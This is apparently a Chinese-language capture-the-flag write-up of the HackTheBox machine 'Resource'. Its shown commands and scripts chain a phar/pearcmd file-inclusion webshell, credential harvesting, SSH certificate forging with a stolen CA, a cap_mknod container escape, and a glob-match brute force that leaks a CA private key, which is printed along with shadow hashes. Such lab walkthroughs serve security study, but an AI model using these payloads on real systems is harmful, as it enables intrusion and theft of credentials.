HackTheBox - Machine - Resource

Recommand: Let’s Sign Up HTB Academy to get Higher level of knowledge :P

非常推薦: 想要變强嗎? 快來加入 HTB Academy 獲得更高級的知識吧 :P

Resource

image

https://www.hackthebox.com/achievement/machine/463126/619

總結:整個機器在玩ssh的證書,還有一些guesswork。

0x1 - Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 62 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 d5:4f:62:39:7b:d2:22:f0:a8:8a:d9:90:35:60:56:88 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBATYMh9+BdqMhKwmA92batW+nssvLnig8s6LRKfe4TUd4IfmWsL1NeMU+03etGZssHGdzVGuKWinJEZP8nxPCSg=
|   256 fb:67:b0:60:52:f2:12:7e:6c:13:fb:75:f2:bb:1a:ca (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDBeEEQbMbbA8xyqfl6Z4O04eLAIn5/kX1+dhQn96SJp
80/tcp   open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
2222/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPYMhQGEpSM4Alh2GZifayHk69JaFxvinZsgYG+EmcDoShW6Q24vrCoG7QFlArzIHmzoNyPewZ05MjQ7dKttWbk=
|   256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINF7vRlT0/vggYRb7yoEPXwV4ZAZEu0Qq/mfj1sKKjnK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

0x2 - 80 - WEB, PHAR to webshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ curl 10.129.23.64 -v                                                          
*   Trying 10.129.23.64:80...
* Connected to 10.129.23.64 (10.129.23.64) port 80
> GET / HTTP/1.1
> Host: 10.129.23.64
> User-Agent: curl/8.8.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 04 Aug 2024 10:47:00 GMT
< Content-Type: text/html
< Content-Length: 154
< Connection: keep-alive
< Location: http://itrc.ssg.htb/
< 
<html>
<head><title>302 Found</title></head>
<body>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
* Connection #0 to host 10.129.23.64 left intact

用curl 探測下,看到有一個域名,然後掃一下子域名, 什麽也沒有。

image

嘗試隨便注冊:

image

看到鏈接是 ?page=xxxx​,所以嘗試ffuf一下:

image

可以看到非常像是本地的一些文件,類似 db.php​,所以這裏很大幾率會有LFI漏洞。

image

嘗試輸入admin,得到一個神奇的頁面,但是看了一下源碼指向了 /api​ 這個端口,所以嘗試掃一下:

image

看到三個,但是這三個并沒有什麽奇妙的功能。

然後點擊右上角全部,可以看到很多 tickets,因爲當前的用戶沒有權限,所以點進去之後會提示無法查看:

image

觀察了一下,由於可以上傳文件於是嘗試濫用 phar://​:

image

來自:https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md

從上面的提示中看到phar需要指向一個zip包,所以製作一個zip包:

1
2
3
4
$ cat mane.php 
<?php phpinfo(); ?>

$ zip mane.zip mane.php

然後上傳上去:

image

從連接中可以得到zip包的地址:

1
http://itrc.ssg.htb/?page=phar://uploads/4db9a2e856617132b0b6fe3cb73b0907b5f077fd.zip/mane

然後就嘗試訪問:

image

既然可以正常解析,那就上傳一個webshell:

image

得到Webshell。

0x2 - 80 - WEB, Unintended Way to Get Webshell

另一種方法可以參考:

有两个条件

pecl 是 PHP 中用于管理扩展而使用的命令行工具,而 pear 是 pecl 依赖的类库。在 7.3 及以前,pecl/pear 是默认安装的;在 7.4 及以后,需要我们在编译 PHP 的时候指定 --with-pear​ 才会安装。

不过,在 Docker 任意版本镜像中,pcel/pear 都会被默认安装,安装的路径在 /usr/local/lib/php

并且 php.ini 当中 register_argc_argv=On 需要开启

关于 pearcmd 利用总结

image

1
/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?system($_GET['mane']);?>+/var/www/itrc/uploads/mane.php

然後就得到了RCE:

image

0x3 - Shell as www-data

進去之後就翻一下數據庫:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@itrc:/var/www/itrc$ whoami
www-data

www-data@itrc:/var/www/itrc$ cat db.php 
<?php

$dsn = "mysql:host=db;dbname=resourcecenter;";
$dbusername = "jj";
$dbpassword = "ugEG5rR5SG8uPd";
$pdo = new PDO($dsn, $dbusername, $dbpassword);

try {
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    die("Connection failed: " . $e->getMessage());
}

可以看到數據庫在另一個db中,所以嘗試ping一下:

1
2
3
4
5
6
7
www-data@itrc:/var/www/itrc$ ping db
PING db (172.223.0.2) 56(84) bytes of data.
64 bytes from resource-db.docker_resource (172.223.0.2): icmp_seq=1 ttl=64 time=0.088 ms
^C
--- db ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.088/0.088/0.088/0.000 ms

有了賬號密碼就可以直接連接:

1
2
3
4
5
6
7
8
9
10
11
www-data@itrc:/var/www$ mysql -h resource-db.docker_resource -u jj -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 12879
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

然後就是基本的操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
MariaDB [(none)]> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| resourcecenter     |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use resourcecenter;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [resourcecenter]> show tables;
+--------------------------+
| Tables_in_resourcecenter |
+--------------------------+
| messages                 |
| tickets                  |
| users                    |
+--------------------------+
3 rows in set (0.001 sec)

MariaDB [resourcecenter]> select user,password from users;  
+-------------+--------------------------------------------------------------+
| user        | password                                                     |
+-------------+--------------------------------------------------------------+
| zzinter     | $2y$10$VCpu.vx5K6tK3mZGeir7j.ly..il/YwPQcR2nUs4/jKyUQhGAriL2 |
| msainristil | $2y$10$AT2wCUIXC9jyuO.sNMil2.R950wZlVQ.xayHZiweHcIcs9mcblpb6 |
| mgraham     | $2y$10$4nlQoZW60mVIQ1xauCe5YO0zZ0uaJisHGJMPNdQNjKOhcQ8LsjLZ2 |
| kgrant      | $2y$10$pLPQbIzcehXO5Yxh0bjhlOZtJ18OX4/O4mjYP56U6WnI6FvxvtwIm |
| bmcgregor   | $2y$10$nOBYuDGCgzWXIeF92v5qFOCvlEXdI19JjUZNl/zWHHX.RQGTS03Aq |
| cgxllxtxbr  | $2y$10$dhWgauaX5rWlSMFBC1e2dedv0ePpBDtBOY7eVkcI2npSjsNt0hvB2 |
| ucvjlpbfnn  | $2y$10$VCZJdE/UWFmGMG7/vo725.jgvv1oyrqwYtAkKnlK91wT4zmLoeBpm |
| cozapndgfj  | $2y$10$DdSbELDiuxPH3Uvfqn/dlegaGQ3VtAOICyXGTVeoKNptdL8r90H7y |
| mane        | $2y$10$CIEZvBNeWUlL/AZBS.jbEOGf1/73FF4DELGPBAfgWIDB7vl37qk62 |
+-------------+--------------------------------------------------------------+

我嘗試爆破了上面的密碼,但是沒有成功,所以我就放棄了。

接下來看一下 messages​ 和 tickets​:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
MariaDB [resourcecenter]> select * from messages \G;
*************************** 1. row ***************************
             id: 18
        message: I will take care of this.
   from_user_id: 2
     created_at: 2024-02-01 12:01:57
      ticket_id: 1
     attachment: NULL
attachment_name: NULL
*************************** 2. row ***************************
             id: 19
        message: Access granted. Signed key will be emailed to you via encrypted email.
   from_user_id: 2
     created_at: 2024-02-03 09:02:33
      ticket_id: 1
     attachment: NULL
attachment_name: NULL
*************************** 3. row ***************************
             id: 20
        message: Thank you. Got it.
   from_user_id: 3
     created_at: 2024-02-03 09:03:12
      ticket_id: 1
     attachment: NULL
attachment_name: NULL
*************************** 4. row ***************************
             id: 21
        message: On it.
   from_user_id: 1
     created_at: 2024-02-03 14:57:51
      ticket_id: 3
     attachment: NULL
attachment_name: NULL
*************************** 5. row ***************************
             id: 22
        message: I will take care of this.
   from_user_id: 2
     created_at: 2024-02-04 13:44:53
      ticket_id: 4
     attachment: NULL
attachment_name: NULL
*************************** 6. row ***************************
             id: 23
        message: We're having some issues with the signing process. I'll get back to you once we have that resolved.
   from_user_id: 2
     created_at: 2024-02-04 14:25:04
      ticket_id: 4
     attachment: NULL
attachment_name: NULL
*************************** 7. row ***************************
             id: 24
        message: Can you attach a HAR file where the issue happens so the web team can troubleshoot?
   from_user_id: 1
     created_at: 2024-02-04 16:12:44
      ticket_id: 5
     attachment: NULL
attachment_name: NULL
*************************** 8. row ***************************
             id: 25
        message: Attached.
   from_user_id: 2
     created_at: 2024-02-04 16:47:23
      ticket_id: 5
     attachment: ../uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
attachment_name: failure.zip
*************************** 9. row ***************************
             id: 26
        message: Any update here? There's a bit of a panic going on in finance.
   from_user_id: 4
     created_at: 2024-02-05 08:01:36
      ticket_id: 3
     attachment: NULL
attachment_name: NULL
*************************** 10. row ***************************
             id: 27
        message: We're going to take four laptops in for reimaging. Will update as that progresses.
   from_user_id: 1
     created_at: 2024-02-05 08:12:11
      ticket_id: 3
     attachment: NULL
attachment_name: NULL
*************************** 11. row ***************************
             id: 28
        message: They see the issue. I'm going to have to work with the IT team in corporate to get this resolved. For now, they've given me access to the IT server and a bash script to generate keys. I'll handle all SSH provisioning tickets.
   from_user_id: 1
     created_at: 2024-02-05 15:32:54
      ticket_id: 5
     attachment: NULL
attachment_name: NULL
*************************** 12. row ***************************
             id: 29
        message: It's this kind of stuff that makes me say it was a bad idea to move off the old system.
   from_user_id: 2
     created_at: 2024-02-05 15:45:11
      ticket_id: 5
     attachment: NULL
attachment_name: NULL
*************************** 13. row ***************************
             id: 30
        message: I've sent you the signed key via secure email
   from_user_id: 1
     created_at: 2024-02-06 09:12:11
      ticket_id: 4
     attachment: NULL
attachment_name: NULL
*************************** 14. row ***************************
             id: 31
        message: Got it. Thanks.
   from_user_id: 5
     created_at: 2024-02-06 11:25:33
      ticket_id: 4
     attachment: NULL
attachment_name: NULL
*************************** 15. row ***************************
             id: 32
        message: The API from the IT server seems to be working well now. I've got a script that will sign public keys with the appropriate principal to validate it works. I'm still handling these tickets, but hopefully we'll have it resolved soon.
   from_user_id: 1
     created_at: 2024-02-07 16:21:23
      ticket_id: 5
     attachment: NULL
attachment_name: NULL
*************************** 16. row ***************************
             id: 33
        message: The new system is super flakey. I know it won't work across the rest of the company, but I'm going to at least leave the old certificate in place here until we prove we can work on the new one
   from_user_id: 2
     created_at: 2024-02-09 16:45:19
      ticket_id: 2
     attachment: NULL
attachment_name: NULL
*************************** 17. row ***************************
             id: 34
        message: Old certificates have been taken out of /etc. I've got the old signing cert secured. This server will trust both the old and the new for some time until we work out any issues with the new system.
   from_user_id: 2
     created_at: 2024-02-10 09:12:11
      ticket_id: 2
     attachment: NULL
attachment_name: NULL
*************************** 18. row ***************************
             id: 35
        message: Thanks for the update. I'm sure the new system will be fine. Closing this ticket.
   from_user_id: 1
     created_at: 2024-02-10 11:27:43
      ticket_id: 2
     attachment: NULL
attachment_name: NULL
*************************** 19. row ***************************
             id: 36
        message: All testing of the updated API seems good. At IT's request I've deleted my SSH keys for their server. I'll still handle tickets using the script until we get a chance to update the ITRC web admin panel to use it.
   from_user_id: 1
     created_at: 2024-02-10 11:53:42
      ticket_id: 5
     attachment: NULL
attachment_name: NULL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
MariaDB [resourcecenter]> select * from tickets \G;
*************************** 1. row ***************************
             id: 1
        subject: Need SSH Access to HR Server
         status: closed
           body: I need to access the HR server to update the employee handbook.
     created_at: 2024-02-01 08:09:21
   submitted_by: 3
     attachment: ../uploads/e8c6575573384aeeab4d093cc99c7e5927614185.zip
attachment_name: pubkey-mgraham-please-sign.zip
*************************** 2. row ***************************
             id: 2
        subject: Decommission ITRC SSH Certificate
         status: closed
           body: We need to decommission the old ITRC SSH certificate infrastructure in favor of the new organization-wide IT signing certs. I'm handling the transition to the new system from the ITSC-side. Mike - Can you handle removing the old certs from the ITRC server?
     created_at: 2024-02-02 13:12:11
   submitted_by: 1
     attachment: NULL
attachment_name: NULL
*************************** 3. row ***************************
             id: 3
        subject: Malware in finance dept
         status: open
           body: We have detected malware on the finance department server. We need to take it offline and clean it.
     created_at: 2024-02-03 14:12:11
   submitted_by: 4
     attachment: NULL
attachment_name: NULL
*************************** 4. row ***************************
             id: 4
        subject: Please provision access to marketing servers
         status: closed
           body: I'm new to the IT team, need access to the marketing servers in order to apply updates and configure firewall. Public key attached.
     created_at: 2024-02-04 13:27:27
   submitted_by: 5
     attachment: ../uploads/eb65074fe37671509f24d1652a44944be61e4360.zip
attachment_name: mcgregor_pub.zip
*************************** 5. row ***************************
             id: 5
        subject: SSH Key Signing Broken
         status: open
           body: The admin panel is supposed to allow me to get a signed certficate, but it just isn't working.
     created_at: 2024-02-04 14:19:54
   submitted_by: 2
     attachment: NULL
attachment_name: NULL
*************************** 6. row ***************************
             id: 6
        subject: AutoPWN
         status: open
           body: AutoPWN
     created_at: 2024-07-25 11:28:39
   submitted_by: 6
     attachment: ../uploads/b829beac87ea0757d7d3432edeac36c6542f46c4.zip
attachment_name: shell.zip
*************************** 7. row ***************************
             id: 7
        subject: AutoPWN
         status: open
           body: AutoPWN
     created_at: 2024-07-25 11:30:31
   submitted_by: 7
     attachment: ../uploads/21de93259c8a45dd2223355515f1ee70d8763c8a.zip
attachment_name: shell.zip
*************************** 8. row ***************************
             id: 8
        subject: AutoPWN
         status: open
           body: AutoPWN
     created_at: 2024-07-25 12:48:56
   submitted_by: 8
     attachment: ../uploads/88dd73e336c2f81891bddbe2b61f5ccb588387ef.zip
attachment_name: shell.zip
*************************** 9. row ***************************

你可以看到有一些重要的文件放在了 uploads​ 的地方:

image

根據上面的 attachment​ 和 attachment_name​,下載覺得有價值的東西,解壓後得到:

image

然後一個一個分析,har是谷歌瀏覽器的通信記錄數據包,説不定有密碼在裏面,所以搜一下:

image

得到賬號密碼:

1
user=msainristil&pass=82yards2closeit

image

嘗試登錄ssh,看到了一個證書:

image

然後來看一下用戶:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msainristil@itrc:~/decommission_old_ca$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:100:65534::/run/sshd:/usr/sbin/nologin
msainristil:x:1000:1000::/home/msainristil:/bin/bash
zzinter:x:1001:1001::/home/zzinter:/bin/bash

有一個 zzinter​的用戶,根據上面的email提示,key 需要簽名才可以使用,所以嘗試給用戶 zzinter​ 簽名:

1
2
3
4
ssh-keygen -t rsa -b 4096 -C "mane@manesec.com" -f id_rsa
chmod 600 ca-itrc
ssh-keygen -s ca-itrc -I zzinter -n zzinter -V +1000w id_rsa.pub
ssh -i id_rsa zzinter@10.129.23.18

然後得到了shell:

image

0x4 - Shell as zzinter to Root the Container

在他的家目錄中可以看到一個脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
zzinter@itrc:~$ cat sign_key_api.sh 
#!/bin/bash

usage () {
    echo "Usage: $0 <public_key_file> <username> <principal>"
    exit 1
}

if [ "$#" -ne 3 ]; then
    usage
fi

public_key_file="$1"
username="$2"
principal_str="$3"

supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "    webserver - external web servers - webadmin user"
        echo "    analytics - analytics team databases - analytics user"
        echo "    support - IT support server - support user"
        echo "    security - SOC servers - support user"
        echo
        usage
    fi
done

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

public_key=$(cat $public_key_file)

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

然後看一下登錄時簽名的内容,可以參考:https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/deployment_guide/sec-viewing_an_ssh_ca_certificate

image

看到儅 key 和 principals 相同的時候可以登錄,所以就有一個想法,嘗試修改脚本,讓root的principals等於 root:

image

改好了之後嘗試簽名:

image

image

得到 container 的root權限。

0x5 - Guess work for login host

由上面的内容發現用戶名和 principal​ 相等的情況下可以登錄宿主主機的ssh,宿主主機的ssh在2222端口。脚本也提示有四個:webserver, analytics, support, support​,所以嘗試爆破下

image

結果在support的時候就進去了:

image

0x6 - Exploit cap_mknod​, Unintended Way to Root

這是非預期的root,回到容器,跑了一下deepce:

image

看到居然喲 cap_mknod​,那就可以和往常的 Intuition​ 非預期提權一樣,提取sda所有的ssh,

參考:https://manesec.github.io/2024/04/29/2024-htb-machine/17-Intuition/0xB8 Unintended Root - Container Escape​。

所以準備sda塊文件:

1
2
3
4
5
6
7
root@itrc:/# cp /bin/sh /maneshell
root@itrc:/# chmod 777 /maneshell 
root@itrc:/# mknod sda b 8 0
root@itrc:/# chmod 777 sda
root@itrc:/# ls -lah sda
brwxrwxrwx 1 root root 8, 0 Aug  4 12:41 sda
root@itrc:/#

在容器上新建一個用戶

1
root@itrc:/# useradd support

因爲宿主的用戶是1000

image

所以要手動編輯 /etc/passwd​ 改成1000:

image

之後隨便複製一個進程,方便在宿主主機的shell中認出來當前的進程:

1
2
3
root@itrc:/# su support
$ /maneshell
$

然後就找進程,和容器裏的sda路徑:

image

找到了容器的sda在哪之後,用gurp嘗試把所有的key給提取出來:

1
support@ssg:~$ grep -a -A 80 "BEGIN OPENSSH PRIVATE KEY" /proc/2745/root/sda > key.txt

由於這個key.txt非常亂,所以使用工具提取所有的ssh Key:https://github.com/manesec/tools4mane/blob/main/Tools/ExtractSSHKeyFromBinary.py

1
$ python3 extra.py -i key.txt -o output

得到一堆key:

image

但是現在的key需要簽名證書才可以使用,前面提過,在用戶名和principal​ 相等的情況下才可以登錄,但是爲什麽宿主卻不行?

所以去翻一下ssh的配置文件,看到:

image

原來root需要用 root_user​的principal​ 才可以登錄,所以邊簽名邊爆破:

1
2
$ chmod 600 output/*
$ for x in {1..200}; do echo $x ; ssh-keygen -s output/$x -z 200 -I root -V -10w:forever -n root_user id_rsa.pub  ; ssh -v -p 2222 -i id_rsa  root@10.129.23.18   -o PasswordAuthentication=no ; done

等一會就得到了root shell:

image

非預期的root。

0x7 - Intended Way to Root

預期的root:在support的時候看到ssh的配置文件,zzinter​的principal​要求在 zzinter_temp​才可以認證成功。

image

由於自帶的脚本限制了 principal​只能是:webserver, analytics, support, support​,所以可以修改脚本達到任意principal​的效果,然後强制讓 zzinter​的principal​在 zzinter_temp​:

1
2
zzinter@itrc:~$ bash mane.sh id_rsa.pub zzinter zzinter_temp
ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgqvnY4mb7sMGLdSdhOzUyyu7/bIwzyT/mjt6MCgJlyw4AAAADAQABAAACAQDMLCLD3hkehm2fp9x3xMFAfcIiwxWSUQagbzhrtTnqA7QzmUsCJA8cubX38GKx6pRr+hoEpxEjNbb7aBbZhoRGuI020hmUMv1mlaLd6hzoxu3mF6y7yoBIyiYDFaFi9X7rqZuFxcFSFXJcM5hxc20UvNxwXF/tT7ydiMgKFLq6mxRUAOJM0SHbdkDE3yE5FAeec+EBU+Q5rmg2PQXszQ1mACStjAsA3ejPWC/sWuIy1gNFr6JPtOoD5IKYLaupTC4JqqwhYeI2YPtN956Yntat0e+lrqB1YItL6MdcrV/NNjG9B4OxbLfSVgqdZHZE5J+ERjnThBy4XgskEsKh+WExmHDafUpH5pMlh0ptw+fbxcmIy8MfEQLQyVd50t85K/7aKN4hglRB+Zo6KSwyi6BGSjsRCXhPWeat9OctoPCTimYD5wLoDLMI9VuZNdGFaVNI+0gtfGsqyLn4RBBiJtzu6QJZ+Hc3s+DCZRa59jqY2Xy6dZSEqjuThSOHrdN5JeSaq7DIclkEpPLWy5WZqN4gNdEfm1QtNylVb9msshoWKZsqacvbjig1EwsP8giRFlhz3bYJWwSRtxuulvpK7ybg2UdbrlJZoFXRCvptyyFDPVHoI0xQwU9jr/1nsZED5TdyTgJMjlaJadHMf4Gx/uDeyBwXtHMYEGC1e9a0WjrcUQAAAAAAAAApAAAAAQAAAAd6emludGVyAAAAEAAAAAx6emludGVyX3RlbXAAAAAAZqZBWP//////////AAAAAAAAAIIAAAAVcGVybWl0LVgxMS1mb3J3YXJkaW5nAAAAAAAAABdwZXJtaXQtYWdlbnQtZm9yd2FyZGluZwAAAAAAAAAWcGVybWl0LXBvcnQtZm9yd2FyZGluZwAAAAAAAAAKcGVybWl0LXB0eQAAAAAAAAAOcGVybWl0LXVzZXItcmMAAAAAAAAAAAAAADMAAAALc3NoLWVkMjU1MTkAAAAggeDwK53LVKHJh+rMLcA2WABxbtDgyhm57MATyY0VKbEAAABTAAAAC3NzaC1lZDI1NTE5AAAAQK0YbcnUFvbMayn1losLrObKKgwKaeIt88VVNB1mVjJSCtLDzzj60EHq5LCdXhKndAed/KPd6KnHVPTV8Sg1hAw= mane@manesec.com

之後嘗試登錄,結果得到 zzinter​ 的ssh:

image

然後看一下sudo -l​:

1
2
3
4
5
6
zzinter@ssg:~$ sudo -l
Matching Defaults entries for zzinter on ssg:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User zzinter may run the following commands on ssg:
    (root) NOPASSWD: /opt/sign_key.sh

可以使用root執行 /opt/sign_key.sh​:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
zzinter@ssg:~$ cat /opt/sign_key.sh
#!/bin/bash

usage () {
    echo "Usage: $0 <ca_file> <public_key_file> <username> <principal> <serial>"
    exit 1
}

if [ "$#" -ne 5 ]; then
    usage
fi

ca_file="$1"
public_key_file="$2"
username="$3"
principal="$4"
serial="$5"

if [ ! -f "$ca_file" ]; then
    echo "Error: CA file '$ca_file' not found."
    usage
fi

if [[ $ca == "/etc/ssh/ca-it" ]]; then
    echo "Error: Use API for signing with this CA."
    usage
fi

itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
    echo "Error: Use API for signing with this CA."
    usage
fi

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "    webserver - external web servers - webadmin user"
        echo "    analytics - analytics team databases - analytics user"
        echo "    support - IT support server - support user"
        echo "    security - SOC servers - support user"
        echo
        usage
    fi
done

if ! [[ $serial =~ ^[0-9]+$ ]]; then
    echo "Error: '$serial' is not a number."
    usage
fi

ssh-keygen -s "$ca_file" -z "$serial" -I "$username" -V -1w:forever -n "$principals" "$public_key_name"

但是這個脚本有漏洞:

1
2
3
4
5
6
itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
    echo "Error: Use API for signing with this CA."
    usage                                 
fi

他會去比較你輸入的内容,如果 mane​ = m*​ 的話也算是 True​,這樣就可以爆破 itca​ 的内容來讀取整個ssh的key,之前的機器可以參考:https://0xdf.gitlab.io/2024/04/06/htb-codify.html#exploit

所以隨便寫一個脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import string
import subprocess

guessstr = '0123456789 +/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz=-' + '\n'

guess = ""
print("Power by mane :P")

def test(stri,c):
    global guess
    f = open('/home/zzinter/test', 'w')
    f.writelines(stri)
    f.close()

    out = subprocess.getoutput("sudo /opt/sign_key.sh test id_rsa.pub mane mane 100")
    if "Use API for signing with this CA" in out:
        guess += c
        return True
    return False

while True:
    print(guess)
    found = False
    for x in guessstr:
        rec = test(guess + x + "*", x)
        if rec:
            found = True
            continue

    if not found:
        break

得到key:

image

得到:

1
2
3
4
5
6
7
8
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAKg7BlysOwZc
rAAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQ
AAAEBexnpzDJyYdz+91UG3dVfjT/scyWdzgaXlgx75RjYOo4Hg8Cudy1ShyYfqzC3ANlgA
cW7Q4MoZuezAE8mNFSmxAAAAIkdsb2JhbCBTU0cgU1NIIENlcnRmaWNpYXRlIGZyb20gSV
QBAgM=
-----END OPENSSH PRIVATE KEY-----

使用這個key來前面:

1
2
3
4
$ ssh-keygen -t rsa -b 4096 -C "mane@manesec.com" -f id_rsa
$ chmod 600 *
$ ssh-keygen -s key.txt -z 200 -I root -V -10w:forever -n root_user id_rsa.pub
$ ssh -i id_rsa -p 2222 root@10.129.23.18

得到root:

image

Hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@ssg:~# cat /etc/shadow
root:$y$j9T$qpGVMzY3EEEN7mc8vCa/r0$vyQQ/Jnzax8ldwJp6CLYh3q95Mg0kOmmJUXS4zXL.p0:19779:0:99999:7:::
daemon:*:19579:0:99999:7:::
bin:*:19579:0:99999:7:::
sys:*:19579:0:99999:7:::
sync:*:19579:0:99999:7:::
